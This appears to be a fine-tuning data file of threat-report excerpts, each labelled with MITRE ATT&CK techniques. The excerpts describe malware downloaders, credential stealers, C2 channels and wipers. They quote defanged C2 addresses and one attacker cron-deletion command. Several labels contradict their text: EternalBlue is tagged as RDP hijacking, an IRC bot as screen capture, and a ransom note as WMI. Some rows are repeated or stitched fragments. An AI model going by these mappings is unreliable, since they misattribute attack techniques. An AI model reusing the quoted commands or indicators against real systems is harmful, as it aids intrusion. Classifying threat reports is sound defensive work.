181loaddl: a command responsible for downloading and executing additional modules using the rundll32.exe process. selfkill: a command that is responsible for self-terminating and deleting the malware from the machine['T1105 - Ingress Tool Transfer']fine_tune
182WMI permanent event subscriptions can be used to trigger actions when specified conditions are met. Attackers often use this functionality to persist the execution of backdoors at system start up. Subscriptions consist of three core WMI classes: a Filter, a Consumer, and a FilterToConsumerBinding. WMI Consumers specify an action to be performed, including executing a command, running a script, adding an entry to a log, or sending an email. WMI Filters define conditions that will trigger a Consumer, including system startup, the execution of a program, the passing of a specified time and many others. Creating a WMI permanent event subscription requires administrative privileges on a system['T1546.003 - Event Triggered Execution: Windows Management Instrumentation Event Subscription']fine_tune
183The RTF file contains macro codes that will execute a PowerShell command to retrieve a dynamic-link library (DLL) file before executing it using odbcconf.exe, a command-line utility related to Microsoft Data Access Components. The DLL will drop and execute a malicious JScript using regsvr32.exe, another command-line utility, to download another JScript and execute it using the same regsvr32.exe. During analysis, we received a PowerShell command that downloads Cobalt Strike from hxxps://5[.]135[.]237[.]216[/]RLxF['T1059.001 - Command and Scripting Interpreter: PowerShell', 'T1218.010 - Signed Binary Proxy Execution: Regsvr32', 'T1218.008 - Signed Binary Proxy Execution: Odbcconf']fine_tune
184In addition to the browser credential stealer, Olympic Destroyer drops and executes a system stealer. The stealer attempts to obtain credentials from LSASS with a technique similar to that used by Mimikatz['T1555.003 - Credentials from Password Stores: Credentials from Web Browsers', 'T1003.001 - OS Credential Dumping: LSASS Memory']fine_tune
185The SOMBRAT backdoor is packaged as a 64-bit Windows executable. It communicates with a configurable command and control (C2) server via multiple protocols, including DNS, TLS-encrypted TCP, and potentially WebSockets. The backdoor's primary purpose is to download and execute plugins provided via the C2 server. In contrast to the SOMBRAT version published in November 2020, Mandiant observed additional obfuscation and armoring to evade detection; this SOMBRAT variant has been hardened to discourage analysis. Program metadata typically included by the compiler has been stripped and strings have been inlined and encoded via XOR-based routines['T1095 - Non-Application Layer Protocol']fine_tune
186As seen in the above image, the Bazar backdoor can handle quite a few commands. This next section focuses on case 1, which retrieves various pieces of additional information on the infected machine['T1005 - Data from Local System']fine_tune
1872) Scan the network environment of the infected machine; checks for availability of specific ports on servers that share the same internal and external subnet mask (i.e 255.255.0.0\16). 3) Try to exploit the following Remote Code Execution vulnerabilities in the targeted servers['T1046 - Network Service Discovery']fine_tune
188Harvest cookies and a password database for supported browsers. Supports: Win7 IE, Win10 IE, Edge, Chrome, and Naver Whale - Recursively search a path and upload file metadata (timestamps, size, and full path). - Spawn a thread to recursively search a path and upload files as a ZIP archive['T1539 - Steal Web Session Cookie']fine_tune
189A recent Lokibot campaign has been spotted, which made use of a tunneling service to spread the malware. According to My Online Security, threat actors behind this campaign leveraged a service known as Ngrok. As claimed on the website, Ngrok reveals servers in NATs and Firewalls over secure tunnels. Hence, the service acted as a direct tunnel or a VPN which the actors exploited to push the malware through spam emails['T1572 - Protocol Tunneling']fine_tune
190The script itself works as a downloader for additional files needed for loading the malware into the system, which are hosted separately as a ZIP package. We confirmed two different techniques used for distributing the Melcoz backdoor: the AutoIt loader script and DLL Hijack['T1105 - Ingress Tool Transfer']fine_tune
191The Magic Hound campaign was also discovered deploying an IRC Bot, which we have named MagicHound.Leash. We discovered this connection when we observed a DropIt sample installing a backdoor Trojan that used IRC for its C2 communications['T1113 - Screen Capture']fine_tune
1925) Downloads the ‘kinsing’ malware and runs it 6) Uses crontab to download and run the shell script every minute 7) Looks for other commands running in cron, and if ones were identified, deletes all cron jobs, including its own. We are not certain why the attackers chose to do so, but that is what the script executes:crontab -l || sed '/update.sh/d' || crontab['T1059.004 - Command and Scripting Interpreter: Bash', 'T1053.003 - Scheduled Task/Job: Cron']fine_tune
193Once on a victim’s PC, the dropper executable is launched and it decrypts and loads the Gh0stRAT DLL into memory. It then passes the config buffer to the extracted DLL and calls the exported function (Shellex['T1129 - Server Software Component']fine_tune
194The Warzone RAT can steal credentials from the Outlook and Thunderbird email clients as shown in the image below (figure 10['T1555.003 - Credentials from Password Stores: Credentials from Web Browsers']fine_tune
195Emotet could be dropping malware with Remote Access Trojan (RAT) capabilities damaging the integrity of the overall network. After reviewing systems for Emotet indicators, reimage and move clean systems to a containment VLAN, segregated from the infected network. It is possible that the Outlook account may now have rules to auto-forward all emails to an external email address, which could result in a data breach. Search base64 encoded network stream data referencing the organization’s email domain. If references are found, perform additional analysis to see if a data breach has occurred['T1114.001 - Email Collection: Local Email Collection']fine_tune
196Attack overview . Flagpro is used in the initial stage of attacks to investigate the target’s environment, download a second stage malware and execute it. Flagpro communicates with a C&C server, and it receives commands to execute from the server, or Flagpro downloads a second stage malware and then executes it. Therefore, Flagpro may have already been used for attacking cases at that point. We call this sample using MFC as “Flagpro v2.0” and the old one as “Flagpro v1.0” in this article. Once Flagpro is launched, it communicates with a C&C server and executes the received commands as shown in the above list. If it is not included in both Download Command fields in the command, Flagpro will not execute the main processes such as downloading, executing OS commands, collecting authentication information, and so on. If a Download Command field has “ExecYes”, Flagpro downloads and executes the file. In requesting commands, sending execution results of OS commands or collected authentication information, Flagpro accesses a C&C server with specific URL paths and queries. The following image is an example of the response: Detections . To detect attacks using Flagpro, it is effective to create and install custom signatures on both network and endpoint devices. In addition, the investigation commands after Flagpro establishes the connection with the C&C server like the following are also useful for detection['T1069.001 - Permission Groups Discovery: Local Groups']fine_tune
197Figure 5 Uploading a file to server via RGDoor Downloading a file from the server via RGDoor['T1105 - Ingress Tool Transfer']fine_tune
198If the configuration is parsed successfully, the program writes the string "Meteor has started. to an encrypted log file, suggesting that the internal name of the malware is “Meteor“. As we will see later on in this article, another name was used in previous attacks. Throughout the entire execution of the malware, it keeps logging its actions to this same encrypted log file. Appendix C contains a helper script to decrypt the log file['T1105 - Ingress Tool Transfer']fine_tune
199Alongside evidence of compromise of the organization itself, Symantec also found a copy of one of the company’s own files, relating to its messaging software, on a staging server used by Chafer. The file was in a directory alongside a number of hacking tools used by the attackers['T1005 - Data from Local System']fine_tune
200Skidmap uses fairly advanced methods to ensure that it and its components remain undetected. For instance, its use of LKM rootkits — given their capability to overwrite or modify parts of the kernel — makes it harder to clean compared to other malware. In addition, Skidmap has multiple ways to access affected machines, which allow it to reinfect systems that have been restored or cleaned up['T1059.004 - Command and Scripting Interpreter: Bash']fine_tune
201During this activity, we noticed the wiper changing the system time to August 2012, as the temporary license key for the RawDisk driver requires the system time to not exceed the month of August, which is when the temporary license would expire. This modification to the system time was seen in the previous campaign, and the temporary license key within the wiper component is the exact same as the wiper component from the 2012 attacks. The wiper itself queries the following registry keys to obtain a list of partitions to overwrite['T1012 - Query Registry']fine_tune
202Of note, we also discovered the Sofacy group using a very similar delivery document to deliver a new Trojan called Cannon. Cannon uses SMTPS and POP3S as its C2 channel compared to Zebrocy that uses a more commonly observed HTTP or HTTPS based C2. Add the layer of encryption that the SMTPS and POP3S protocols provide to the legitimate web-based service and you have a very difficult C2 channel to block['T1071.003 - Mail Protocols']fine_tune
203If you use /p, del displays the name of a file and sends the following message: FileName, Delete (Y/N)? To confirm the deletion, press Y. To cancel the deletion and display the next file name (that is, if you specified a group of files), press N. For example, the following command deletes all of the files in the \Work folder: Copy del \work - You can use wildcards (* and ?) to delete more than one file at a time. However, to avoid deleting files unintentionally, you should use wildcards cautiously with the del command. For example, if you type the following command: Copy del *.* The del command displays the following prompt: Are you sure (Y/N)? To delete all of the files in the current directory, press Y and then press ENTER. To cancel the deletion, press N and then press ENTER['T1070.004 - Indicator Removal on Host: File Deletion']fine_tune
204To do this, Tick uses a number of publicly available hacktools such as Mimikatz, GSecdump, and Windows Credential Editor['T1003.001 - OS Credential Dumping: LSASS Memory']fine_tune
205Win32/Diskcoder.D has the ability to spread via SMB. First, it scans internal networks for open SMB shares. It looks for the following shares['T1135 - Network Share Discovery']fine_tune
206In January 2016 we published our analysis of a spearphishing attack against energy companies in Ukraine. That attack probably has a connection to the infamous BlackEnergy attacks in 2015 because the attackers used exactly the same mail server to send spearphishing messages. However, the attacks in January 2016 were different. Instead of using the BlackEnergy malware family, the attackers used a relatively simple open-source backdoor, written in the Python programming language, called GCat. The Python code of the GCat backdoor was obfuscated, then converted into a stand-alone executable using the PyInstaller program['T1070.004 - Indicator Removal on Host: File Deletion']fine_tune
207HttpBrowser is a remote access tool whose name originates from the hard-coded "HttpBrowser/1.0" User-Agent. Table 2 lists the commands available to threat actors in one of the HttpBrowser variants['T1083 - File and Directory Discovery']fine_tune
208When the malicious RTF document is opened, two things happen that allow the attacker's malware to run. First, the "packager trick" is leveraged in order to embed the initial QuasarRAT dropper (qrat.exe) in the malicious RTF document. It's called the "packager trick" because any file embedded in an RTF file using packager will be automatically dropped to the %tmp% folder (c:\Users\%username%\AppData\Local\Temp) when the RTF document is opened. Second, the threat actors exploit CVE-2017-8570 to achieve code execution via a malicious "scriptlet" file, or .sct file, which is also embedded in the malicious RTF document. The contents of the malicious scriptlet file (displayed below) clearly show the threat actor executing the initial "qrat.exe" dropper from the current user's %tmp% directory['T1204.002 - User Execution: Malicious File']fine_tune
209It uses two components to avoid detection by a single component. The dropper uses an old trick in a new way: It appends the RAT to a Word document. Upon opening the document, a macro is executed that will extract the malware and execute it['T1059.005 - Command and Scripting Interpreter: Visual Basic']fine_tune
210Finally, the attacker added their own devices as allowed IDs for active sync for a number of mailboxes using Set-CASMailbox['T1098.005 - Device Registration', 'T1098.002 - Account Manipulation: Additional Email Delegate Permissions']fine_tune
211SDBbot is a new remote access Trojan (RAT) written in C++ that has been delivered by the Get2 downloader in recent TA505 campaigns. Its name is derived from the debugging log file (sdb.log.txt) and DLL name (BotDLL[.]dll) used in the initial analyzed sample. It also makes use of application shimming [1] for persistence['T1566.001 - Phishing: Spearphishing Attachment']fine_tune
2121) Text file Drive.txt (SHA-256: 4f75622c2dd839fb5db7e37fb0528e38c4eb107690f51f00b5331e863dc645d1) is created and contains the decimal-decoded VBS content. The content of both files is shown in the appendix section of this report. Audio.bat continues by creating two scheduled tasks referencing two files that are yet to exist: dphc.exe will run every 10 minutes and Drive.vbs at 20 minute intervals. When Drive.vbs is eventually executed by the task scheduler, it will download the BackConfig executable payload. and only continues if the file exists. 3) Similarly, the VBA code then writes batch code to another text file - Audio.txt. The content of both files is shown in the appendix section of this report. 6) Audio.bat continues by creating two scheduled tasks referencing two files that are yet to exist: dphc.exe will run every 10 minutes and Drive.vbs at 20 minute intervals. When Drive.vbs is eventually executed by the task scheduler, it will download the BackConfig executable payload. and only continues if the file exists['T1083 - File and Directory Discovery']fine_tune
2131) Text file Drive.txt (SHA-256: 4f75622c2dd839fb5db7e37fb0528e38c4eb107690f51f00b5331e863dc645d1) is created and contains the decimal-decoded VBS content. Similarly, the VBA code then writes batch code to another text file - Audio.txt. The content of both files is shown in the appendix section of this report. Audio.bat continues by creating two scheduled tasks referencing two files that are yet to exist: dphc.exe will run every 10 minutes and Drive.vbs at 20 minute intervals. In the case of file 8892279f3. the remote location is http://185.203.119[.]184/Dropbox/request. and only continues if the file exists. 2) Text file Drive.txt (SHA-256: 4f75622c2dd839fb5db7e37fb0528e38c4eb107690f51f00b5331e863dc645d1) is created and contains the decimal-decoded VBS content. 3) Similarly, the VBA code then writes batch code to another text file - Audio.txt. 6) Audio.bat continues by creating two scheduled tasks referencing two files that are yet to exist: dphc.exe will run every 10 minutes and Drive.vbs at 20 minute intervals. In the case of file 8892279f3. the remote location is http://185.203.119[.]184/Dropbox/request['T1070.004 - Indicator Removal on Host: File Deletion']fine_tune
214The dropped file is executed after terminating any process with the same name. For persistence, it adds a shortcut for the file at the %STARTUP% directory['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder']fine_tune
215The data exfiltration process runs in the following sequence: The temp.ini files are copied into a text file that matches the pattern['T1020 - Automated Exfiltration']fine_tune
216Recursively generate a list of files in a directory and send to the control server - Terminate a specific process. The process is identified by the control server sending the PID to the malware['T1057 - Process Discovery', 'T1543.003 - Create or Modify System Process: Windows Service', 'T1119 - Automated Collection']fine_tune
217Upon opening the attachment, a typical luring mechanism is employed instructing the victim to enable macros, as seen in Figure 2. FireEye has observed the attackers behind this campaign using three different approaches['T1204.002 - User Execution: Malicious File']fine_tune
218After the files are encrypted the program will write a ransom note to each folder and directory on the system called read_me_unlock.txt['T1047 - Windows Management Instrumentation']fine_tune
219In October 2016 Group-IB published the report about the Cobalt group. Network penetration In all cases investigated by Group-IB, the Cobalt group used a set of spear phishing emails to gain initial access to the corporate infrastructure. However, some of the email addresses belong to employees that no longer work at the organization, which means that the Cobalt group likely uses out-of-date mailing lists. Therefore, the Cobalt group registered domains that are similar to real ones (for example, diebold.pw), and configured their email server to send messages as if from these legitimate domains (fig. Provision of the malware survivability The Cobalt group uses different methods to ensure malware survivability on corporate networks. The goal is to set the startup path to the executable file or program code, launching it with the powershell.exe shell command to access the Internet resource specified in the code in order to download and install the Cobalt Strike module. From our experience, the Cobalt group uses a new method to provide its survivability in every attack. Cobalt Strike provides the ability to use the Artifact Kit framework for these purposes and even modify it, as it is distributed in source code form. Use of standard tools Cobalt Strike is publicly accessible, and can be downloaded in order to learn and create detection rules on the network. Conclusion After infecting one computer on an organization's network, the Cobalt group analyzes the programs used on it and searches for critical servers and the computers from which they are accessed['T1059.001 - Command and Scripting Interpreter: PowerShell']fine_tune
220The exploit used, named EternalBlue, exploits a vulnerability in the Server Message Block (SMB) protocol which allows the malware to spread to all unpatched Windows systems from XP to 2016 on a network that have this protocol enabled. This vulnerability allows remote code execution over SMB v1. WannaCry utilizes this exploit by crafting a custom SMB session request with hard-coded values based on the target system. Notably, after the first SMB packet sent to the victim’s IP address, the malware sends two additional packets to the victim containing the hard-coded IP addresses 192.168.56.20 and 172.16.99.5['T1563.002 - Remote Service Session Hijacking: RDP Hijacking']fine_tune
221The file /tmp/.rOuYXzdOF was most likely used as a mutex, ensuring only one copy of Netwire could run at a time. Next, .default.conf was a configuration file storing data required for Netwire to communicate with command and control. On the Windows side, this is usually stored in the Registry['T1112 - Modify Registry']fine_tune
222This time, the text is from the novel "The Brothers Karamazov" by Fyodor Dostoevsky (a Russian writer). The malicious document drops a Python interpreter and PoetRAT. The author made a few changes to the PoetRAT malware, though. First, the malware uses pyminifier to obfuscate the Python script and avoid detection based on string or YARA rules: The obfuscation is a base64 and an LZMA compression algorithm. For example, the variables are stored in a "Constant.py" file containing the C2 server and the configuration. The most notable change is the protocol used to download and upload files['T1071.001 - Application Layer Protocol: Web Protocols']fine_tune
223The backdoor determines its C2 server using a Domain Generation Algorithm (DGA) to construct and resolve a subdomain of avsvmcloud[.]com. The Update method is responsible for initializing cryptographic helpers for the generation of these random C2 subdomains. Subdomains are generated by concatenating a victim userId with a reversible encoding of the victims local machine domain name['T1132.001 - Data Encoding: Standard Encoding']fine_tune
224The attack starts with a phishing email that contains a malicious link to a file hosted on Google Docs named “Annual Bonus Report.doc”. When the user clicks on the link, the TrickBot dropper downloads onto the target machine. This differs from previous TrickBot attacks we have seen, where TrickBot is usually dropped through a Microsoft Office document or by another malware like Emotet['T1204.002 - User Execution: Malicious File', 'T1566.002 - Phishing: Spearphishing Link']fine_tune
225Ahnlab, a South Korean software company, simultaneously published a paper regarding Bisonal's activity in South Korea. In this case, the infection vector has changed from previous samples. The initial stage is a binary that drops a decoy document (PowerPoint or Excel document), a VisualBasic script and the packed Bisonal payload. The payload is dropped with a .jpg extension that's been renamed to ".exe". The payload has been packed with a new packer. The code of Bisonal is similar to the version of 2019['T1137.006 - Office Application Startup: Add-ins']fine_tune
226One of the discovered MarkiRAT variants was used to intercept the execution of Telegram and launch the malware along with it. The core of the malware is the same as described previously for MarkiRAT, with the exception of functions in charge of the malware’s deployment on the victim machine['T1518.001 - Software Discovery: Security Software Discovery']fine_tune
227This behavior is detailed later in the blog under "Malware Functionality". Unlike WannaCry, Nyetya does not appear to contain an external scanning component. Two of the executables are used to recover user credentials (32 and 64 bits) while the third one is the PsExec binary. For example: The dropped .tmp executable seems to be based on Mimikatz, a popular open source tool used for recovery of user credentials from computer memory using several different techniques. The recovered credentials are then used for launching malware on the remote system using WMIC and PsExec. These mechanisms are used to attempt installation and execution of perfc.dat on other devices to spread laterally. The two exploits drop a modified version of DoublePulsar which is a persistent backdoor running in kernel space of the compromised system. The developer modified only few bytes from the original version but this modification allowed it to evade network detection and the open source DoublePulsar scanning tools available on the Internet. The modification can be divided in 3 parts: - The attacker modified the command codes: - The attacker modified the response codes: - The attacker modified where the response code is stored in the SMB response packet. PsExec is used to execute the following instruction (where w.x.y.z is an IP address) using the current user's windows token (from the "Recovery of User Credentials" section above) to install the malware on the networked device. WMI is used to execute the following command which performs the same function as above, but using the current user's username and password (as username and password), retrieved from the "Recovery of User Credentials" section above['T1003.001 - OS Credential Dumping: LSASS Memory']fine_tune
228For persistence and remote control, the script downloads another base64-encoded Python script from hxxps://ptpb[.]pw/OAZG. After several steps of de-obfuscation, we found the attackers using EmPyre for post-exploitation control. EmPyre is a Python post-exploitation agent built on cryptologically-secure communications and a flexible architecture['T1059.006 - Command and Scripting Interpreter: Python']fine_tune
229When required by the attacker, it is capable of remotely activating the microphone on the compromised computer and capturing sounds. The audio recordings are encoded to MP3 format using a legitimate lame.dll library, which is downloaded and misused by the malware['T1123 - Audio Capture']fine_tune
230On 2022-01-15, MSTIC (Microsoft Threat Intelligence Center) identified and unveiled a cyberattack targeting Ukrainian organizations with “WhisperGate”, which overwrites the Master Boot Record (MBR) and files['T1561.002 - Disk Structure Wipe']fine_tune
231The AppleSeed payload has an export function named “DllRegisterServer” which will be called when the DLL is executed using RegSvr32.exe. DllRegisterServer has a function that is responsible for performing the DLL initialization and setup that includes the following steps['T1059.007 - Command and Scripting Interpreter: JavaScript', 'T1059.001 - Command and Scripting Interpreter: PowerShell']fine_tune
232Yet, both in August 2018 and 2019 Silent Librarian was lining up for the new academic years, once again targeting the same kind of victims in over a dozen countries['T1598.003 - Spearphishing Link']fine_tune
233Manage the use of privileged accounts. Configure access controls, including file, directory, and network share permissions with the principle of least privilege in mind. If a user only needs to read specific files, they should not have write access to those files, directories, or shares. Secure use of WMI by authorizing WMI users and setting permissions. Disable or limit remote WMI and file sharing. Block remote execution through PSEXEC. Segregate networks and functions. Harden network devices and secure access to infrastructure devices. Perform out-of-band network management. Disable SMBv1 and block all versions of SMB at the network boundary by blocking TCP port 445 with related protocols on UDP ports 137-138 and TCP port 139; this applies to all boundary devices['T1021.002 - Remote Services: SMB/Windows Admin Shares']fine_tune
234The original malware scans the list of running processes looking for outlook, iexplore or firefox. If found, it injects the DLL into the process['T1055.001 - Process Injection: Dynamic-link Library Injection', 'T1057 - Process Discovery']fine_tune
235Download a file from a remote server - Create a text file on the local machine - Execute a file - Execute a shell (cmd.exe) command and save the results to disk - Upload the results of a previously executed shell command to a remote server['T1105 - Ingress Tool Transfer']fine_tune
236The main purpose of P8RAT is downloading and executing payloads (consisting of PE and shellcode) from its C2 server. However, we were unable to obtain any sample of the subsequent payloads for this malware['T1105 - Ingress Tool Transfer']fine_tune
237Unlike previous RDAT samples, this particular sample only uses DNS tunneling for its C2 communications with no HTTP fallback channel. This RDAT sample can only use TXT queries in its DNS tunnel and will issue queries structured like the following['T1071.004 - Application Layer Protocol: DNS', 'T1008 - Fallback Channels']fine_tune
238Other researchers have attributed these attacks to a group known as the Cobalt Gang, which has continued its activities even after the arrest of its alleged leader in Spain this year. AppLocker works well for executables and over time it has also been improved to control various script types, including JScript, PowerShell and VBScript. This has significantly reduced the attack surface and forced attackers, including more sophisticated groups, to find new methods of launching executable code. Payload dropper in an XSL file Another executable used to attempt bypass of the AppLocker feature is msxsl.exe, a Windows utility used to run XSL (eXtensible Stylesheet Language) transformations. Stage 4 — Downloaders . PowerShell leading to shellcode . The PowerShell chain is launched from an obfuscated JScript scriptlet previously downloaded from the command and control (C2) server and launched using cmstp.exe. JScript downloader . As opposed to PowerShell loading a Cobalt Strike beacon, the other observed infection chain continues using JScript to deliver the final payload, which is a JScript backdoor. The commands are relatively limited, but are sufficient enough to instruct the backdoor to download and execute a new payload, remove itself from the system or download and launch additional scriptlets. Interestingly, if an attack used version 4.4, the attackers decided to add a variable "researchers" initialized to the string "We are not cobalt gang, stop associating us with such skids. Cobalt Strike beacon . On the PowerShell side of the infection chain, the downloaded final payload is a Cobalt Strike beacon, which provides the attacker with rich backdoor functionality. Cobalt Strike is used by penetration testers and offensive security researchers when delivering their services, but it is generally, just as Meterpreter, detected by anti-malware software as it can be easily used by malicious actors['T1059.001 - Command and Scripting Interpreter: PowerShell']fine_tune
239DUBNIUM (which shares indicators with what Kaspersky researchers have called DarkHotel) is one of the activity groups that has been very active in recent years, and has many distinctive features['T1518.001 - Software Discovery: Security Software Discovery']fine_tune
240The malware initializes by gathering system and malware filename information and creates a mutex to make sure only one instance of the Trojan executes on the system at a time. Kazuar generates its mutex by using a process that begins with obtaining the MD5 hash of a string “[username]=>singleton-instance-mutex”. The Trojan then encrypts this MD5 hash using an XOR algorithm and the serial number of the storage volume. Kazuar uses the resulting ciphertext to generate a GUID that it appends to the string “Global\\” to create the mutex['T1087.001 - Account Discovery: Local Account', 'T1082 - System Information Discovery']fine_tune
241Key takeaways: - TeamTNT is using new, open source tools to steal usernames and passwords from infected machines. The campaign has been active for approximately one month and is responsible for thousands of infections globally. Background . TeamTNT has been one of the most active threat groups since mid 2020. One of the most recent findings (June 4, 2021) came from Palo Alto researchers who discovered the TeamTNT Chimaera repository. TeamTNT C&C website showing infection statistics . Figure 2. The full list of supported programs can be found on the Lazagne page on Github. Windows module - persistence . Kubernetes root payload component . This component is mainly responsible for installing a cryptocurrency miner on infected devices, allowing the attacker to connect remotely to the system using SSH. Decoded shell script . TeamTNT IRC bot . As described previously this year by Lacework, TeamTNT includes ZiggyStartux in their IRC bot. IRC Bot available commands . TeamTNT AWS stealer . Similar to the other TeamTNT components, the AWS stealer (see figure 11) first installs missing dependencies. Conclusion . AT&T Alien Labs has discovered new malicious files distributed by the threat actor TeamTNT['T1518.001 - Software Discovery: Security Software Discovery']fine_tune
242As mentioned by the Cisco Talos Intelligence Group, after executing the Micropsia registers itself against the C2 server['T1082 - System Information Discovery']fine_tune
243The binary uses a file system watcher in order to generate an event each time a file is modified in one of the directories in the "Paths" variable of the configuration file. Filesystem monitoring routine Once a file is available, the Dog.exe binary exfiltrates it, using email or FTP depending on the configuration['T1119 - Automated Collection']fine_tune
244At line 40, that data is piped through the base64 utility for decoding, dropped in a subfolder in the /tmp directory, given executable permissions via chmod, and then launched as the 2nd stage payload['T1222.002 - File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification']fine_tune
245Sodinokibi ransomware, also known as REvil or Sodin, has been responsible for a series of high-profile attacks since April 2019['T1204.002 - User Execution: Malicious File']fine_tune
246PowerShell scripts that perform system reconnaissance and credential theft from Windows Credential Manager and then send this information back to Waterbug C&Cs['T1555.004 - Credentials from Password Stores: Windows Credential Manager']fine_tune
247After successfully executing the command, POWRUNER sends the results back to the C2 server and stops execution['T1059.003 - Command and Scripting Interpreter: Windows Command Shell']fine_tune
248Retrieves the following data from the system by leveraging Windows Management Instrumentation (WMI) queries and environment variables: IP Address from Network Adapter Configuration OS Name OS Architecture Computer Name Computer Domain Name Username - IP Address from Network Adapter Configuration - OS Name - OS Architecture - Computer Name - Computer Domain Name - Username['T1047 - Windows Management Instrumentation', 'T1082 - System Information Discovery', 'T1016 - System Network Configuration Discovery']fine_tune
249Endpoint Protection . The Trojan.Hydraq Incident . It has been about a week since news of the mysterious Hydraq Trojan (also known as Aurora) attack broke with the unveiling of a threat by Google to pull its operations out of China. Although concrete details of the attacks are not yet public, Google made reference to a number of Gmail accounts that were compromised during or after the attacks. In the more sophisticated attacks, the attacker will use a new zero day vulnerability, as obviously this will have a greater success rate. In this attack a PDF file was used to exploit the Adobe Acrobat, Reader, and Flash Player Remote Code Execution Vulnerability (CVE-2009-1862/BID35759). This PDF installed a Trojan horse which was an earlier version of the current Trojan.Hydraq. Considering the efforts that the attackers put into staging the attack as a whole, the end malware is not so sophisticated. This means the remote attacker has the ability to see in real time any user interface activity as if they were sitting right next to the user. The backchannel URL addresses have been changed by the Dynamic DNS sites to resolve to a loopback address (127.0.0.2). This in effect severs the connection to the control servers. As described in the previously posted blog (Hydraq - An Attack of Mythical Proportions), an unpatched Internet Explorer vulnerability (BID 37815) was used as one of the propagation vectors for this particular Trojan.Hydraq attack. This security hole allows remote exploitation, which means that attackers can run any malicious code of their liking on a victim’s machine by taking advantage of the vulnerability. The use of browsers other than Internet Explorer by an increasingly large number of people may have helped limit the “attack surface” by reducing the number of computers vulnerable to the Internet Explorer vulnerability used in this attack['T1016 - System Network Configuration Discovery']fine_tune
250One of the most noticeable differences is the use of encryption over the entire TCP segment, as a way for it to evade detection. Additionally, this seems to be a lightweight version of Gh0stRAT, as it only has 12 commands, compared to the 73 for a full Gh0stRAT sample; 3 of those commands are undocumented. Also, unlike most samples that I receive on my honeypot, this sample did not start as a DLL that communicates to a distribution server in order to download the stage1['T1573 - Encrypted Channel', 'T1095 - Non-Application Layer Protocol']fine_tune
251The attackers gain an initial foothold on targeted machines via phishing emails containing malicious attachments. The emails are often industry-specific and crafted to entice a victim to open the message and execute the attached document['T1566.001 - Phishing: Spearphishing Attachment']fine_tune
252The companies believe that the actors acquired legitimate credentials prior to the cyber-attack to facilitate remote access['T1078 - Valid Accounts', 'T1219 - Remote Access Software']fine_tune
253A loading script, written in Ruby, was saved to the following location and set to run as a Scheduled Task['T1053.005 - Scheduled Task/Job: Scheduled Task']fine_tune
254The name EvilBunny is derived from debug information embedded in the malware’s dropper. Furthermore, the specified piece incorporates a Lua 5.1 interpreter, which allows the malware to execute Lua scripts and change its behavior at runtime. The dropper will place the EvilBunny malware under %APPDATA%\Perf Manager\ or %WINDIR%\msapps\; depending whether the dropper is running with administrative privileges or not. Also, the malware will generate numerous files to help its execution and frequently reply back to the C&C with status messages. Similar to its dropper, the binary seeks to evade sandboxes. Next to that, the main thread also runs sub threads to maintain log files the malware creates during execution and to keep track of the overall system load the malware creates. The worker threads are internally dubbed ‘hearer’, which is believed to stand for ‘listener’. It can be concluded thereafter that the malware authors were no English native speakers. The main action of the malware is carried out in the main thread, which parses commands and executes Lua scripts, provided by the worker threads via command files. Each hearer has a dedicated method to receive instructions which is either separately via HTTP from the server, aggregated through a downloaded data file or as tasks to be configured as scheduled tasks. In general this is a rather uncommon technique, but it has been observed before, especially in connection with some adware variants['T1497.001 - Virtualization/Sandbox Evasion: System Checks']fine_tune
255The malware continues by creating a service named mssecsvc2.0 with a binary path pointing to the running module with the arguments "-m security". Once created, the malware starts the service['T1543.003 - Create or Modify System Process: Windows Service']fine_tune
256Sends phishing mail to given recipients and receives user’s access token using device code authentication flow['T1528 - Steal Application Access Token']fine_tune
257First-stage analysis . When the user opens the phishing email, it presents a Spanish social engineering message ("Payment: Find scheduled payment dates attached"). The figure below shows a screenshot of one of the emails we looked at. It decrypts the URL for the second stage from hardcoded bytes, saves it to the "Templates" folder, and executes it. Second-stage analysis . The second-stage executable is packed with a Delphi-based packer. The DLL sets a timer, as shown below, which will execute the downloader function periodically. The DLL decodes the hex string using the following steps: We have written a small Python script to decrypt the third stage. The same decryption method was also used to decrypt the hardcoded command and control (C2). The resulting file is also a DLL, which the second stage reflectively loads. Injected DLL analysis (UAC bypass using two techniques) . It checks if `C:\Windows\Finex` exists. Decrypting and executing Lokibot . After attempting to bypass the UAC, the third-stage DLL will check if `AutoRunKeyFlag` is set. For this DLL, it is not set. This dropper uses three stages and three layers of encryption to hide its final payload['T1053 - Scheduled Task/Job']fine_tune
258Find out all system information, including hardware being used and the exact version of your operating system, including security patches. Steal from your clipboard (things you’ve copied) - Control your printer - Lock/Restart/Shutdown your computer - Update the implant with a new address to beacon to or new functionality['T1082 - System Information Discovery']fine_tune
259This step establishes the persistence of the malware across reboots on the endpoint - Once the decrypted MZ marker is written to the Startup folder, the 2.hwp is deleted from the endpoint['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder']fine_tune
260Interestingly as we continued to expand and pivot in our data set, one of the C2 IPs used by an IRC bot payload from Magic Hound was found to be the same IP used to deliver a different IRC bot called MPK['T1071 - Application Layer Protocol']fine_tune
261They include registry, file system manipulations, and searching files with specific patterns, and retrieving and transferring them back to the server and gathering network status information['T1083 - File and Directory Discovery']fine_tune
262OopsIE Trojan Analysis The OopsIE Trojan delivered in these attacks is packed with SmartAssembly and further obfuscated with ConfuserEx v1.0.0. The Trojan extracts and loads this embedded assembly by concatenating the contents of two resources named S1 and S2 and decompresses the resulting data using the GZipStream class. The resulting Interop.SHDocVw .NET assembly is packed with SmartAssembly and further obfuscated using Confuser v1.9.0.0. By using the InternetExplorer application object, all C2 related requests will look as if they came from the legitimate browser and therefore will not contain any anomalous fields within the request, such as custom User-Agents. As seen in the above request, the Trojan will generate a URL for its beacon with the following structure: http://<c2 domain>/chk. hex(Environment.UserName/Environment.MachineName)> The Trojan will issue a request to this URL to check (hence the chk string in the URL) to see if the C2 server has a command for the Trojan to run. The C2 server will respond to the Trojan’s request by echoing the value <hex(Environment.UserName/Environment.MachineName)> if it wishes to provide additional commands. If the C2 server does not respond with the appropriate echoed data, the Trojan will create a file named srvCheckresponded.tmp in the SpecialFolder.CommonApplicationData folder and write nothing to it before exiting. If the C2 server provides the appropriate echoed data in the response, the Trojan attempts to determine what commands the C2 wishes to run by issuing a request to the following URL: http://<c2 domain>/what. hex(Environment.UserName/Environment.MachineName)> After issuing the what command, the Trojan will parse the C2's response for the string Oops, which the Trojan will treat as the C2 making a mistake and will exit['T1071.001 - Application Layer Protocol: Web Protocols']fine_tune
